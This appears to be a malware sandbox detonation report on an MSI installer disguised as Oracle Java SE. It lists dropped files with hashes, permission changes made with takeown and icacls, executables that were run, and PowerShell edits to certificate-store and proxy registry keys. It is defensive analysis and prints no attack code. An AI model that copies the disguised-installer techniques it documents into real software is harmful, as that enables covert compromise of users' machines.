| SHA512 | 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | e008fbfdea1bf873f3d94d74c1cf7935 |
| SHA1 | 2a2af5e9084e7b55cdd5d01df342b02c1917573c |
| SHA256 | 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b |
| SHA512 | 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | fb0ca6cbfff46be87ad729a1c4fde138 |
| SHA1 | 2c302d1c535d5c40f31c3a75393118b40e1b2af9 |
| SHA256 | 1ee8e99190cc31b104fb75e66928b8c73138902fefedbcfb54c409df50a364df |
| SHA512 | 99144c67c33e89b8283c5b39b8bf68d55638daa6acc2715a2ac8c5dba4170dd12299d3a2dffb39ae38ef0872c2c68a64d7cdc6ceba5e660a53942761cb9eca83 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | c9a55de62e53d747c5a7fddedef874f9 |
| SHA1 | c5c5a7a873a4d686bfe8e3da6dc70f724ce41bad |
| SHA256 | b5c725bbb475b5c06cc6cb2a2c3c70008f229659f88fba25ccd5d5c698d06a4b |
| SHA512 | adca0360a1297e80a8d3c2e07f5fbc06d2848f572f551342ad4c9884e4ab4bd1d3b3d9919b4f2b929e2848c1a88a4e844dd38c86067cace9685f9640db100efb |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 3f224766fe9b090333fdb43d5a22f9ea |
| SHA1 | 548d1bb707ae7a3dfccc0c2d99908561a305f57b |
| SHA256 | ae5e73416eb64bc18249ace99f6847024eceea7ce9c343696c84196460f3a357 |
| SHA512 | c12ea6758071b332368d7ef0857479d2b43a4b27ceeab86cbb542bd6f1515f605ea526dfa3480717f8f452989c25d0ee92bf3335550b15ecec79e9b25e66a2ca |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 23bd405a6cfd1e38c74c5150eec28d0a |
| SHA1 | 1d3be98e7dfe565e297e837a7085731ecd368c7b |
| SHA256 | a7fa48de6c06666b80184afee7e544c258e0fb11399ab3fe47d4e74667779f41 |
| SHA512 | c52d487727a34fbb601b01031300a80eca7c4a08af87567da32cb5b60f7a41eb2cae06697cd11095322f2fc8307219111ee02b60045904b5c9b1f37e48a06a21 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 6e704280d632c2f8f2cadefcae25ad85 |
| SHA1 | 699c5a1c553d64d7ff3cf4fe57da72bb151caede |
| SHA256 | 758a2f9ef6908b51745db50d89610fe1de921d93b2dbea919bfdba813d5d8893 |
| SHA512 | ade85a6cd05128536996705fd60c73f04bab808dafb5d8a93c45b2ee6237b6b4ddb087f1a009a9d289c868c98e61be49259157f5161feccf9f572fd306b460e6 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 95c5b49af7f2c7d3cd0bc14b1e9efacb |
| SHA1 | c400205c81140e60dffa8811c1906ce87c58971e |
| SHA256 | ff9b51aff7fbec8d7fe5cc478b12492a59b38b068dc2b518324173bb3179a0e1 |
| SHA512 | f320937b90068877c46d30a15440dc9ace652c3319f5d75e0c8bb83f37e78be0efb7767b2bd713be6d38943c8db3d3d4c3da44849271605324e599e1242309c3 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 79ee4a2fcbe24e9a65106de834ccda4a |
| SHA1 | fd1ba674371af7116ea06ad42886185f98ba137b |
| SHA256 | 9f7bda59faafc8a455f98397a63a7f7d114efc4e8a41808c791256ebf33c7613 |
| SHA512 | 6ef7857d856a1d23333669184a231ad402dc62c8f457a6305fe53ed5e792176ca6f9e561375a707da0d7dd27e6ea95f8c4355c5dc217e847e807000b310aa05c |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 1776a2b85378b27825cf5e5a3a132d9a |
| SHA1 | 626f0e7f2f18f31ec304fe7a7af1a87cbbebb1df |
| SHA256 | 675b1b82dd485cc8c8a099272db9241d0d2a7f45424901f35231b79186ec47ee |
| SHA512 | 541a5dd997fc5fec31c17b4f95f03c3a52e106d6fb590cb46bdf5adad23ed4a895853768229f3fbb9049f614d9bae031e6c43cec43fb38c89f13163721bb8348 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | ad99c2362f64cde7756b16f9a016a60f |
| SHA1 | 07c9a78ee658bfa81db61dab039cffc9145cc6cb |
| SHA256 | 73ab2161a7700835b2a15b7487045a695706cc18bcee283b114042570bb9c0aa |
| SHA512 | 9c72f239adda1de11b4ad7028f3c897c93859ef277658aeaa141f09b7ddfe788d657b9cb1e2648971ecd5d27b99166283110ccba437d461003dbb9f6885451f7 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | d5166ab3034f0e1aa679bfa1907e5844 |
| SHA1 | 851dd640cb34177c43b5f47b218a686c09fa6b4c |
| SHA256 | 7bcab4ca00fb1f85fea29dd3375f709317b984a6f3b9ba12b8cf1952f97beee5 |
| SHA512 | 8f2d7442191de22457c1b8402faad594af2fe0c38280aaafc876c797ca79f7f4b6860e557e37c3dbe084fe7262a85c358e3eeaf91e16855a91b7535cb0ac832e |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 9ddea3cc96e0fdd3443cc60d649931b3 |
| SHA1 | af3cb7036318a8427f20b8561079e279119dca0e |
| SHA256 | b7c3ebc36c84630a52d23d1c0e79d61012dfa44cdebdf039af31ec9e322845a5 |
| SHA512 | 1427193b31b64715f5712db9c431593bdc56ef512fe353147ddb7544c1c39ded4371cd72055d82818e965aff0441b7cbe0b811d828efb0ece28471716659e162 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 1e109b1d40efcfec81a5d43d318cbb26 |
| SHA1 | 03aae193dc36d70fb34257d1276666e988b4a222 |
| SHA256 | 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69 |
| SHA512 | 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll
C:\Config.Msi\f778883.rbs
C:\Windows\Installer\f778881.msi
| MD5 | 1d2fdd9c09c8452e9c88222f2c16806a |
| SHA1 | 5852958feca13943a937f638a0ea6cfb59307574 |
| SHA256 | 7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5 |
| SHA512 | 4af7abc59c5dcfa065b858b1cb6a5a89f2e79d777acbcc5c7fc57175e20973bad0712f4d9adcb5eeec7bd8c44c90e255f4e22ba9035f2a82d1e8cc45aea87fb1 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll
memory/1248-220-0x000007FEF61F0000-0x000007FEF6670000-memory.dmp
memory/1248-222-0x000007FEF61F0000-0x000007FEF6670000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-07 11:25
Reported
2024-10-07 11:28
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA74E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57a2e7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B787FD59-D138-4CB1-8AF7-72A4E4815245} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA400.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA46F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA897.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57a2e7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{B787FD59-D138-4CB1-8AF7-72A4E4815245}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\e57a2e9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Loads dropped DLL
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
